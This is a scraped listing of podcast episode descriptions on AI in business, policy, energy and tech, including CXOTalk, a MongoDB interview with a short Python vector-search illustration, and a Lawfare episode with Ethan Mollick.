Too often, AI breaks in the wild. Why? CXOTalk 890 dissects the adversarial economy with Steven C. Daffron (fintech private equity leader) and Anthony Scriffignano (distinguished data scientist), hosted by Michael Krigsman. Discover the challenges of AI implementation and the strategies needed to navigate the future of work in an AI-driven world. Stay informed with expert insights on CXOTalk.
What you'll learn:
How AI enables and masks adversarial behavior
Misaligned incentives, data/model drift, and bias
Governance vs. regulation; resilient metrics and KPIs
Investor/CFO implications and talent/education needs
Michael Ruckman, founder and CEO of Senteo, takes us on a fascinating journey from aspiring medical student to influential global consultant with experience in over 40 countries. Join us as Michael shares his unique insights on the transformative power of AI in reshaping the business landscape, highlighting the concept of relationship currency. We explore his intriguing experiences, from navigating the Russian banking sector as an American expatriate to the nuances of living abroad, all peppered with Michael's signature humor and wisdom. As businesses face the challenges of adapting to change, we dissect the roles people play in fostering innovation, from early adopters to laggards. Drawing from humor and everyday observations, such as the quirks of our personal habits like organizing gummy bears, we delve into the complexities of leadership and change management. The discussion transitions to remote work's impact, revealing the importance of understanding employee dynamics and the necessity of onstage versus offstage support in organizational transformations. The conversation further explores the role of AI in customer interactions, stressing the importance of genuine empathy that AI often lacks. We highlight the evolution of business models from product-centric to customer-centric approaches and the significance of prioritizing customer relationships for long-term success. Through compelling case studies, we examine how companies can better utilize AI to enhance human interactions rather than replace them, fostering a future where technology meets the nuanced needs of human experiences. Prepare to be inspired as we navigate the ever-evolving world of business, AI, and the critical role of leadership in guiding impactful change. 
CHAPTERS (00:00) - Escape the Drift (09:28) - Navigating Change Leadership in Organizations (20:07) - AI Application in Business Context (23:52) - Customer Relationships in Business Strategy (31:08) - The Evolution of Business Models (39:08) - Customer-Centric Strategies and AI Development (43:39) - AI's Role in Human Experience (52:07) - Leadership and Change in Business (58:54) - Effective Leadership and Change Strategies
In this episode of the Business Lunch podcast, host Roland Frasier sits down with Lucy Guo, a remarkable entrepreneur who made her mark in a short amount of time. Lucy takes us through her inspiring journey, starting from her early days as a kindergartener selling Pokemon cards and colored pencils to her groundbreaking roles as an intern at Facebook and the first female designer at Snap. Lucy shares how she leveraged platforms like PayPal and eBay to turn her skills into financial opportunities. Lucy and Roland delve into the topic of coding and its importance in today's landscape. While Lucy acknowledges the rise of no-code tools, she emphasizes the value of understanding coding fundamentals, particularly when it comes to managing engineering teams and making informed decisions about app development. This podcast episode offers a captivating glimpse into Lucy Guo's entrepreneurial journey, filled with valuable insights and lessons for aspiring entrepreneurs.
HIGHLIGHTS:
"I was always an entrepreneur growing up... I was selling Pokemon cards and colored pencils for money."
"Knowing how to code is important... the best sites today and the best apps today, you still need a team of engineers."
"If you are just a business person and you are hiring a team of engineers, you're gonna get ripped off."
Mentioned in this episode: Get Roland's Training on Acquiring Businesses! Discover The EXACT Strategy Roland Has Used To Found, Acquire, Scale And Sell Over Two Dozen Businesses With Sales Ranging From $3 Million To Just Under $4 Billion! EPIC Training
This week, Tiffany Ap speaks with Grace Shao on the causes and development of AI in China. In this episode, Grace Shao walks us through the divergent approaches to AI deployment in China and the US, the domestic AI talent pool in China, and the future of robotics. Grace also talks about running her newsletter AI Proem and consulting for tech companies, all while raising a toddler and being eight months pregnant at the time of recording.
In this episode, Jacob sits down with Peter Deng, General Partner at Felicis and former Product Leader at OpenAI, Facebook, and Uber. Peter shares his insider perspective on building ChatGPT Enterprise in just seven weeks and leading voice mode development at OpenAI. The conversation covers everything from why traditional SaaS pricing models are broken for AI products to how evals became the new product specs, the "AI under your fingernails" test for founding teams, and why current agents are massively overhyped. They also explore how consumer AI will fragment across multiple winners rather than consolidate into a single super app, the coming integration between ChatGPT and apps like Uber, and why voice AI will unlock entirely new categories of applications. Plus, insights on the changing dynamics between foundation models and startups, and what it really takes to build defensible AI companies. It's a comprehensive look at AI product strategy from someone who's been at the center of the industry's biggest breakthroughs.
(0:00) Intro
(1:17) AI Business Models and Pricing Strategies
(7:48) Product Development in AI Companies
(18:36) The Role of Product Managers in AI
(23:06) Voice Interaction and AI
(26:43) AI in Education
(30:39) Consumer and Enterprise Adoption of AI
(33:36) The Impact of AI on Salaries and HR
(40:37) The Role of Unique Data in AI Development
(49:03) Challenges and Strategies for AI Companies
(52:58) The Future of AI and Its Impact on Society
(57:31) Reflections on OpenAI
(58:38) Quickfire
With your co-hosts: @jacobeffron - Partner at Redpoint, Former PM Flatiron Health @patrickachase - Partner at Redpoint, Former ML Engineer LinkedIn @ericabrescia - Former COO Github, Founder Bitnami (acq'd by VMWare) @jordan_segall - Partner at Redpoint
AI Applied: Covering AI News, Interviews and Tools - ChatGPT, Midjourney, Runway, Poe, Anthropic
In this episode, Jaeden Schafer and Conor Grennan discuss the alarming implications of a leaked Meta document that outlines policies allowing AI interactions with children, including romantic and sensual conversations. They explore the ethical concerns surrounding AI's role in child safety, the public backlash against Meta, and the broader implications for AI interactions in the future. The discussion emphasizes the need for stricter regulations and ethical considerations in AI development, particularly regarding vulnerable populations like children.
AI Applied YouTube Channel: https://www.youtube.com/@AI-Applied-Podcast
Try AI Box: https://aibox.ai
Conor's AI Course: https://www.ai-mindset.ai/courses
Conor's AI Newsletter: https://www.ai-mindset.ai/
Jaeden's AI Hustle Community: https://www.skool.com/aihustle
YouTube Video: https://youtu.be/eNq5jNraoCg
Chapters
00:00 AI and Child Safety Controversy
04:36 Meta's Response and Accountability
09:17 Implications for AI Development and Future Safety
The rapid growth of artificial intelligence is creating a data center boom, but decades-old environmental protections are slowing efforts by big tech to build massive facilities. Wired Magazine has found that companies are asking the White House to ease those protections, and the Trump administration appears to be all in. Ali Rogin speaks with Wired senior reporter Molly Taft for more. PBS News is supported by - https://www.pbs.org/newshour/about/funders. Hosted on Acast. See acast.com/privacy
Alex Gleason was one of the main architects behind Donald Trump's Truth Social. Now he focuses on the intersection of Nostr, AI, and Bitcoin. We explore his latest tool, Shakespeare, which enables anyone to easily vibe code an app in their browser. I vibe my first app live on air.
Alex on Nostr: https://primal.net/p/nprofile1qqsqgc0uhmxycvm5gwvn944c7yfxnnxm0nyh8tt62zhrvtd3xkj8fhggpt7fy
Shakespeare: https://shakespeare.diy/
Soapbox Tools: https://soapbox.pub/tools
The app I vibed live: https://followstream-3slf.shakespeare.to/
EPISODE: 174
BLOCK: 910195
PRICE: 853 sats per dollar
(00:00:01) Treasury Secretary Bessent Intro
(00:01:29) Happy Bitcoin Friday
(00:05:12) AI and Freedom Online
(00:07:04) Shakespeare: Vibe Coding Made Simple
(00:08:03) Concerns About Big AI
(00:15:05) Self Hosting AI and Technical Challenges
(00:22:24) Energy and AI Development
(00:28:14) Building Personalized Experiences with AI
(00:38:02) Nostr's Future and Mainstream Adoption
(00:45:02) Decentralized Hosting and Shakespeare's Future
(00:54:01) Collaborative Development with Nostr Git
(01:02:24) Open Source Renaissance and Future Prospects
Video: https://primal.net/e/nevent1qqstzds6pmkpaser62kme8dk74r4ea4ae3hv9fr2wur0kpc3yyws96gx2pa59
More info on the show: https://citadeldispatch.com
Learn more about me: https://odell.xyz
- Discovery of Secret Room in FBI Building (0:11) - Criticism of FBI and Intelligence Agencies (1:24) - Challenges with Burn Bags and Document Destruction (2:48) - Lack of Arrests and Legal Challenges (5:26) - Summary of Document Findings (9:25) - Trump Administration's Legal Strategy (11:54) - Hopes for Mass Arrests (15:08) - Challenges with Power Grid and AI Data Centers (25:17) - Impact of Tariffs on Transformer Supply (46:48) - Future of Energy and Decentralized Solutions (1:09:21) - Introduction of Enoch AI Engine (1:15:24) - Challenges with AI Data and Personal Experiences (1:25:51) - Development and Performance of the AI Engine (1:28:19) - Decentralization and Open-Source AI (1:30:34) - Training Data and AI Capabilities (1:33:59) - Prompt Engineering and AI Applications (1:40:28) - Challenges and Future of AI Development (1:55:27) - Censorship and Regulatory Concerns (1:57:29) - Global AI Competition and Technological Advancements (2:06:23) - Economic and Political Implications of AI (2:18:04) - Geopolitical Shifts and Centralized Power (2:25:24) - Demoralization and Betrayal of American Dream (2:39:28) - Apocalypse Accelerationism and Christian Zionism (2:42:43) - Critique of Religious Institutions and Their Teachings (2:46:44) - Historical Context and Modern Implications (2:49:42) - Cults and Their Influence on Global Events (2:52:32) - The Role of Media and Education in Shaping Perceptions (2:55:27) - The Impact of Religious Supremacy on Global Conflict (3:12:55) - The Role of Individual Actions in Promoting Peace (3:19:24) - The Future of Global Peace and Understanding (3:21:06)
In this episode of Tech Talks Daily, I sat down with Boris Bialek, VP and Field CTO at MongoDB, for a conversation that moved well beyond databases. As AI continues to accelerate across sectors, MongoDB is positioning itself at the intersection of modern data architecture and intelligent application development. Boris shared how his team is simplifying AI adoption for enterprises, with a clear focus on real-world outcomes, developer productivity, and global inclusion. We began by exploring MongoDB's recent acquisition of Voyage AI. This move extends MongoDB's native capabilities into vector search, embeddings, and re-rankers, allowing developers to build AI-powered applications more efficiently. Boris explained how MongoDB is removing the complexity from AI integration by providing a unified API, collapsing what used to be 18 disconnected tools into a streamlined developer experience. But the discussion wasn't just about technology. Boris brought a passionate focus to the issue of financial inclusion. We talked about how AI can enable alternative credit scoring for the 27 percent of adults globally who remain unbanked. By analyzing behavioral signals such as mobile payment histories or utility data, AI can help unlock microcredit opportunities for individuals and small businesses in underserved regions. Boris shared use cases from PicPay in Brazil, M-Pesa in Africa, and Proxtera in Singapore, each demonstrating how AI and MongoDB are enabling new forms of digital trust. We also tackled the organizational and technical hurdles to enterprise AI adoption. From fears about hallucinations to managing constant model updates, Boris described how MongoDB is building systems that prioritize transparency, auditability, and scale. With its document model and integrated tooling, MongoDB offers a stable foundation for companies navigating fast-moving AI transformations. 
For developers, the platform now includes learnmongodb.com and quick-skill badges designed to make AI approachable and hands-on. And with the upcoming release of Boris's new book, there's more to come on how businesses can move from pilot experiments to production-grade solutions. How is your organization rethinking its data strategy to make AI work at scale?
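The vector search and embeddings capabilities discussed above boil down to one core operation: ranking stored documents by the similarity of their embedding vectors to a query vector. This is a toy conceptual sketch in plain Python, not MongoDB's actual `$vectorSearch` API, and the vectors are hand-made stand-ins for real embedding-model output:

```python
import math

# Tiny "vector store": document name -> embedding vector.
# In a real system these vectors come from an embedding model.
docs = {
    "refund policy": [0.9, 0.1, 0.0],
    "loan application": [0.1, 0.9, 0.2],
    "mobile payments": [0.2, 0.8, 0.6],
}

def cosine(a, b):
    """Cosine similarity: dot product divided by the vector magnitudes."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

def search(query_vec, k=2):
    """Return the k document names most similar to the query vector."""
    ranked = sorted(docs, key=lambda d: cosine(query_vec, docs[d]), reverse=True)
    return ranked[:k]

# A query vector "near" the payments/lending documents ranks them first.
print(search([0.15, 0.85, 0.5]))  # ['mobile payments', 'loan application']
```

Production systems add approximate nearest-neighbour indexes so this scales past brute-force scans, which is the kind of complexity a unified API hides from the developer.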
- Organ Harvesting Nightmare (0:11) - Trump vs. BRICS: The Global Currency War (26:06) - The AI Race and US Energy Production (36:54) - The Economic and Social Implications of AI (1:15:35) - The Role of Free Energy Technology (1:15:57) - The Future of AI and Energy (1:18:37) - The Economic and Political Landscape (1:18:53) - The Role of Government and Industry (1:19:13) - The Impact of Energy Policy on AI Development (1:19:30) - The Future of Energy and AI (1:19:50) - Texas Power Grid and AI Data Centers (1:20:05) - Impact of AI Data Centers on Residential Units (1:25:59) - Challenges of Diesel Generators and Copper Costs (1:26:27) - Historical Decisions and Infrastructure Sabotage (1:30:00) - Global Power and AI Dominance (1:32:29) - Economic and Political Implications (1:33:24) - Preparation for Economic Collapse (1:35:57) - Interview with Bill Holter (1:48:51) - Silver Market and Failure to Deliver (2:10:12) - Societal Impact of Economic Collapse (2:22:13) - Preparedness for Survival Scenarios (2:27:36) - Practical Preparedness Tips (2:41:53) - Final Thoughts and Advice (2:42:55) - Product Promotion and Health Advice (2:43:57)
Ethan Mollick, Professor of Management and author of the “One Useful Thing” Substack, joins Kevin Frazier, the AI Innovation and Law Fellow at the University of Texas School of Law and a Senior Editor at Lawfare, and Alan Rozenshtein, Associate Professor at Minnesota Law and a Senior Editor at Lawfare, to analyze the latest research in AI adoption, specifically its use by professionals and educators. The trio also analyze the trajectory of AI development and related, ongoing policy discussions.More of Ethan Mollick's work: https://www.oneusefulthing.org/Find Scaling Laws on the Lawfare website, and subscribe to never miss an episode.To receive ad-free podcasts, become a Lawfare Material Supporter at www.patreon.com/lawfare. You can also support Lawfare by making a one-time donation at https://givebutter.com/lawfare-institute.Support this show http://supporter.acast.com/lawfare. Hosted on Acast. See acast.com/privacy for more information.